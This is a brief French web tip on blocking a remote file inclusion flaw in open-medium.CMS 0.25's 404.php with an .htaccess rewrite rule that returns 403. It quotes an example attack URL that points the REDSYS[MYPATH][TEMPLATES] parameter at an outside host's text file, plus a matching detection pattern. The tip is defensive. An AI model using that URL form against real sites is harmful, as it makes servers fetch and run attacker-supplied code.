HTACCESS

Protection contre le hack avec 404.php

Le script se trouve peut-être sur votre site géré par open-medium.CMS en version 0.25.

La faille touche les sites dont le paramètre register_globals est à on.

Une petite règle dans le fichier .htaccess permet de renvoyer un code retour 403. Les url concernées sont de la forme : http://www.example.com/404.php?REDSYS[MYPATH][TEMPLATES]=http://sitepourri.com/page.txt?

RewriteCond %{QUERY_STRING} ^(.*&)?REDSYS\[MYPATH\]\[TEMPLATES\]=http://
RewriteRule ^(.+/)?404\.php$ - [F,L]
PHP